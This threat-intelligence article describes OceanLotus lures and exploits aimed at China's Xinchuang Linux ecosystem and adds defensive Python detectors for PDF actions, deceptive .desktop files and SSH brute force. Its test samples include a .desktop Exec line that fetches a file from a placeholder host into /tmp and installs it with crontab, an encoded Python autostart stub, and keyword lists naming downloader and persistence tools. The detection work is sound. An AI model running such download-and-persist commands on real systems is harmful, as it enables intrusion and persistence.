OceanLotus, the moniker the security community uses for the Vietnamese‑linked APT32 group, has quietly shifted gears. Their latest campaign is not aimed at the usual Windows‑centric targets; instead it focuses on Xinchuang, China’s ambitious “New Generation” technology ecosystem that promises full IT self‑reliance through domestically sourced hardware and software. The change is not accidental. As China tightens its grip on critical infrastructure, the attackers see an opportunity to infiltrate systems that have grown increasingly isolated from Western cloud services and open‑source ecosystems.
The Deceptive File‑Based Tactics that Blend Into the Environment
.desktop Files: Linux’s Shortcut with a Dark Side
In 2025, researchers documented a wave of spear‑phishing that used malicious attachments masquerading as official policy documents. One of the most insidious formats was the .desktop file, a Linux analog to the Windows .lnk shortcut. When a user double‑clicked these files, the embedded “Exec” line executed a payload that created scheduled tasks, giving the attackers a persistent foothold for command‑and‑control communication. The naming was deliberate: a file titled “Notice on Printing and Distributing the Minutes of the 2025 Meeting of the Energy Industry Shale Gas Standardization Technical Committee.pdf.desktop” looked like bureaucratic paperwork, but it was a Trojan horse.
.jar Files: Java, the Trusted Compromise Medium
Java remains ubiquitous in government and enterprise terminals, making .jar files an attractive vector. OceanLotus packaged malicious code inside innocuous filenames such as “The Path Dispute of the Asia‑Pacific Free Trade Area and China’s Plan.jar” or “Energy Supply and Demand Statement.xls.jar.” Once executed, these jars would probe the environment, verify that they were running on a legitimate system, and then download secondary payloads—often an installer named “report‑scheduler‑1.0‑SNAPSHOT.jar.” The attackers cleverly hid their real intent behind a veneer of legitimate business documents.
PDF Lures and Office Suites: The Remote‑Hosted Trap
The threat actors also exploited the local productivity stack by embedding malicious links in PDF files that opened WPS Office directly. Victims were lured into opening a document titled “Suggestions for Addressing International Maritime Disputes under the BBNJ Agreement,” which in turn fetched code from a remote server. By targeting the native office suite, the attackers bypassed many of the security controls that would be in place for more exotic file types.
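The PDF lure described above works through document actions: a link or launch action that hands the file to the local office suite and fetches content from a remote host. The following triage script is an added example, not code from the report or from any vendor tool. It scans a PDF's raw bytes and the plaintext of its FlateDecode streams for action dictionaries (/Launch, /JavaScript, /OpenAction, /SubmitForm, /URI), collects URI targets, and assigns a severity. The three PDFs it runs on are constructed inline: the 203.0.113.10 address is an RFC 5737 documentation address and the `/F (wps)` launch target is a placeholder, not an artifact from the campaign.

```python
import re
import zlib

# Constructed samples, not files from the campaign. The URI points at an
# RFC 5737 documentation address; the /Launch target "wps" is a placeholder.
LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj
4 0 obj << /S /URI /URI (http://203.0.113.10/docs/bbnj-suggestions.docx) >> endobj
5 0 obj << /Type /Annot /Subtype /Link /A << /S /Launch /F (wps) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Action names worth triaging, with the severity each one carries on its own.
RISKY_ACTIONS = {
    b"/Launch": "high",        # hands the file to an external program
    b"/JavaScript": "high",    # runs script inside the viewer
    b"/SubmitForm": "medium",  # posts data to a remote host
    b"/OpenAction": "medium",  # fires automatically when the document opens
    b"/URI": "low",            # remote link; benign on its own, but record the target
}
SEVERITY = ["none", "low", "medium", "high"]

URI_RE = re.compile(rb"/URI\s*\((?P<uri>[^)]*)\)")
# A stream body sits between "stream\n" and "endstream"; the lookbehind keeps
# the "stream" inside "endstream" from starting a false match.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(?P<body>.*?)endstream", re.S)


def inflate_streams(data: bytes) -> bytes:
    """Return the concatenated plaintext of every zlib (FlateDecode) stream in data."""
    out = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates the trailing newline that precedes "endstream".
            out.append(zlib.decompressobj().decompress(m.group("body")))
        except zlib.error:
            pass  # not a Flate stream (image data, already plain, or corrupt)
    return b"\n".join(out)


def scan_pdf(data: bytes) -> dict:
    """Triage a PDF: risky actions present (raw or inside Flate streams) and URI targets."""
    haystack = data + b"\n" + inflate_streams(data)
    actions = {}
    for token, severity in RISKY_ACTIONS.items():
        # The lookahead stops "/URI" from matching inside a longer name.
        if re.search(re.escape(token) + rb"(?![A-Za-z])", haystack):
            actions[token.decode()] = severity
    uris = [m.group("uri").decode(errors="replace") for m in URI_RE.finditer(haystack)]
    score = max(actions.values(), key=SEVERITY.index, default="none")
    return {"actions": actions, "uris": uris, "score": score}


def _pack(obj: bytes, num: int = 6) -> bytes:
    """Wrap an object body in a FlateDecode stream the way real PDF writers do."""
    body = zlib.compress(obj)
    return (b"%d 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % (num, len(body))
            + body + b"\nendstream\nendobj\n")


# The same /Launch action hidden in a compressed stream: a raw grep for "/Launch" misses it.
PACKED_PDF = BENIGN_PDF.replace(b"trailer", _pack(b"<< /S /Launch /F (wps) >>") + b"trailer")

if __name__ == "__main__":
    for name, blob in [("lure", LURE_PDF), ("benign", BENIGN_PDF), ("packed", PACKED_PDF)]:
        print(name, scan_pdf(blob))
```

The third sample is the reason the script inflates streams: most writers compress object streams, so a byte-level signature for `/Launch` sees nothing while the inflated text exposes the action. A /URI on its own is common in benign documents, which is why it only records the target and scores low; a /Launch or an /OpenAction that points at a remote fetch is what should trip an alert for an office suite like WPS.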
Vulnerability Exploitation: CVE‑2023‑52076 and the Atril Document Viewer
Mid‑2025 saw a sharp pivot. OceanLotus leveraged CVE‑2023‑52076, a critical flaw in the Atril Document Viewer used by the MATE desktop environment. The attackers packaged the exploit in a malicious EPUB file called “Safety Office Inspection Work – Final Version.epub.” When opened, the code executed a hidden script that installed an autostart entry and an encrypted Python downloader. The result: silent persistence on victim machines, a classic example of turning a legitimate document viewer into a covert command channel.
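Three of the lures above share a shape a defender can check for mechanically: a document extension stacked in front of an executable one (".pdf.desktop", ".xls.jar"), a .desktop file whose Exec line starts an interpreter or downloader instead of an application, and an autostart entry that hides itself and launches an encoded Python stub. The script below is an added example, not code from the report, that triages attachment names and .desktop entries on those criteria and then applies the same checks to an autostart directory. Every sample it runs on is constructed inline (the hostname 203.0.113.10 is a documentation address and the base64 blob decodes to the word PLACEHOLDER); in real use the dictionary of autostart entries would be read from ~/.config/autostart and /etc/xdg/autostart.

```python
import shlex

# Extensions a reader expects to open as a document, and ones that execute.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "epub", "txt"}
EXECUTABLE_EXTS = {"desktop", "jar", "sh", "py", "run", "appimage"}

# If Exec= starts one of these, the entry is a code launcher, not an app shortcut.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "java", "curl", "wget"}

# Fragments that point to download, staging or persistence inside an Exec= line.
SUSPICIOUS_TOKENS = ("http://", "https://", "curl ", "wget ", "/tmp/", "/dev/shm",
                     "base64", "crontab", "systemctl", "nohup", "| sh", "|sh")


def deceptive_name(filename: str) -> bool:
    """True when a document extension is stacked in front of an executable one
    (e.g. "report.xls.jar"), so the file looks like a document but runs."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] in EXECUTABLE_EXTS and parts[1] in DOCUMENT_EXTS


def parse_desktop(text: str) -> dict:
    """Parse the [Desktop Entry] group into a key/value dict (locale suffixes ignored)."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def assess_desktop(filename: str, text: str) -> list:
    """Return the reasons a .desktop entry looks like a lure or a hidden launcher ([] if clean)."""
    reasons = []
    if deceptive_name(filename):
        reasons.append("document extension stacked in front of .desktop")
    entry = parse_desktop(text)
    if entry.get("Type") == "Application" and "pdf" in entry.get("Icon", "").lower():
        reasons.append("Icon imitates a document while Type=Application")
    if entry.get("NoDisplay", "").lower() == "true":
        reasons.append("NoDisplay=true keeps the entry out of menus and autostart settings")
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes; fall back to a naive split
        argv = exec_line.split()
    if argv and argv[0].rsplit("/", 1)[-1] in INTERPRETERS:
        reasons.append(f"Exec starts an interpreter or downloader ({argv[0]})")
    hits = [t.strip() for t in SUSPICIOUS_TOKENS if t in exec_line]
    if hits:
        reasons.append("Exec contains download/staging/persistence tokens: " + ", ".join(hits))
    return reasons


def triage_autostart(entries: dict) -> dict:
    """Map autostart filename -> reasons, keeping only entries that raised at least one."""
    flagged = {}
    for name, text in entries.items():
        reasons = assess_desktop(name, text)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed samples, not the files from the campaign. 203.0.113.10 is a
# documentation address and the base64 payload decodes to the word PLACEHOLDER.
LURE_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting Minutes 2025.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s http://203.0.113.10/x -o /tmp/.x && crontab /tmp/.x"
"""

BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.gedit
Exec=gedit %U
Terminal=false
"""

AUTOSTART_DIR = {  # constructed stand-in for ~/.config/autostart
    "nm-applet.desktop": "[Desktop Entry]\nType=Application\nName=Network\nExec=nm-applet\n",
    "print-service.desktop": (
        "[Desktop Entry]\nType=Application\nName=Print Service\nNoDisplay=true\n"
        "Exec=python3 -c \"exec(__import__('base64').b64decode('UExBQ0VIT0xERVI='))\"\n"
    ),
}

if __name__ == "__main__":
    print(assess_desktop("Meeting Minutes 2025.pdf.desktop", LURE_DESKTOP))
    print(triage_autostart(AUTOSTART_DIR))
```

The name check alone catches "Energy Supply and Demand Statement.xls.jar" and the ".pdf.desktop" lure regardless of content, which makes it a cheap mail-gateway rule; the Exec analysis is what distinguishes a real application shortcut from a launcher, and the same function reused over an autostart directory covers the persistence step the Atril exploit chain ends with.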
Beyond Phishing: Compromising the Supply Chain
Brute‑Force Attacks on Internal Security Servers
Spear‑phishing was just the opening act. Once inside, OceanLotus intensified their efforts by attempting brute‑force intrusions against internal security servers—a move that echoes the tactics seen in the LockBit supply‑chain attacks. The attackers conducted a month‑long reconnaissance phase, gathering credentials and mapping the network. After identifying an unknown vulnerability, they pushed malicious updates to both Xinchuang innovation systems and Windows terminals. This dual‑platform approach indicates a strategic intent to spread infiltration across the entire ecosystem, not just a single stack.
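A brute-force phase against internal servers is loud in authentication logs if anyone is counting. The detector below is an added example, not from the report: it reads sshd lines in the classic syslog format (assumed here as a stand-in for whatever the security servers actually log), keeps a sliding window of failures per source address, raises an alert when the count crosses a threshold, and raises a second, higher-value alert when a login from that same source succeeds shortly after the burst, which is the signal that credentials were obtained rather than merely guessed at. The log lines are constructed inline; the addresses are RFC 5737 ranges and the year is an assumption because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Syslog lines carry no year; this one is an assumption, not parsed from the log.
LOG_YEAR = 2025

# Constructed sshd lines, not the incident's logs. Addresses are RFC 5737 ranges.
AUTH_LOG = """\
Mar  3 02:14:01 secsrv sshd[4121]: Failed password for admin from 203.0.113.45 port 51022 ssh2
Mar  3 02:14:03 secsrv sshd[4123]: Failed password for admin from 203.0.113.45 port 51024 ssh2
Mar  3 02:14:05 secsrv sshd[4125]: Failed password for invalid user updater from 203.0.113.45 port 51026 ssh2
Mar  3 02:14:06 secsrv sshd[4127]: Failed password for root from 203.0.113.45 port 51028 ssh2
Mar  3 02:14:08 secsrv sshd[4129]: Failed password for invalid user deploy from 203.0.113.45 port 51030 ssh2
Mar  3 02:14:09 secsrv sshd[4131]: Failed password for admin from 203.0.113.45 port 51032 ssh2
Mar  3 02:14:40 secsrv sshd[4140]: Accepted password for admin from 203.0.113.45 port 51060 ssh2
Mar  3 02:20:15 secsrv sshd[4201]: Failed password for alice from 192.0.2.7 port 40012 ssh2
Mar  3 02:20:30 secsrv sshd[4203]: Accepted publickey for alice from 192.0.2.7 port 40014 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line: str):
    """Return {"ts", "result", "user", "ip"} for an sshd auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text: str, threshold: int = 5, window: int = 60,
                      follow_up: int = 600) -> list:
    """Flag sources with >= threshold failures inside `window` seconds, and any
    successful login from such a source within `follow_up` seconds of its last failure."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)   # ip -> deque of (ts, user) failures inside the window
    last_fail = {}                # ip -> time of the most recent failure
    bursting, alerts = set(), []
    for e in events:
        ip, ts = e["ip"], e["ts"]
        if e["result"] == "Failed":
            q = recent[ip]
            q.append((ts, e["user"]))
            last_fail[ip] = ts
            while q and (ts - q[0][0]).total_seconds() > window:
                q.popleft()   # expire failures that fell out of the window
            if len(q) >= threshold and ip not in bursting:
                bursting.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip, "failures": len(q),
                               "users": sorted({u for _, u in q}), "at": ts.isoformat()})
        elif ip in bursting and (ts - last_fail[ip]).total_seconds() <= follow_up:
            # A success right after a burst means the guessing worked (or a
            # credential obtained elsewhere was tried from the same host).
            alerts.append({"type": "success_after_bruteforce", "ip": ip,
                           "user": e["user"], "at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(AUTH_LOG):
        print(alert)
```

The `users` field in the first alert is worth surfacing on its own: several distinct usernames from one source inside a minute is spraying, not a user mistyping a password, and the single failure from 192.0.2.7 followed by a key-based login is the benign pattern the thresholds are tuned to ignore. The same structure works over a month of logs, which is the reconnaissance span the text describes, provided the window bookkeeping is per source as it is here.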
A Shift from Windows to Linux‑Centric Operations
Historically, OceanLotus has focused on Windows environments, exploiting familiar weaknesses such as unpatched SMB services or poorly configured Active Directory. The move toward Linux‑based, domestically curated ecosystems marks a significant evolution. It suggests that the threat actor is learning to thrive in environments where the usual defensive tools may be limited or absent. By embedding themselves in the very fabric of Xinchuang, they gain a foothold that is harder for external security firms to detect and remediate.
What Lies Ahead for China’s Self‑Reliant Tech Ecosystem?
As the attackers deepen their presence in Xinchuang, defenders face a new reality: the tools they rely on for detection can themselves become the vector of compromise. The future of security in this context will hinge on proactive threat hunting, zero‑trust architectures, and continuous monitoring of file integrity across both Windows and Linux systems. The broader lesson is clear—when a threat actor can embed itself in the operational backbone of a nation’s technology strategy, the stakes rise dramatically. The next wave of cyber‑defense will need to anticipate not just external attacks but also internal supply‑chain compromises that blur the line between legitimate updates and malicious code.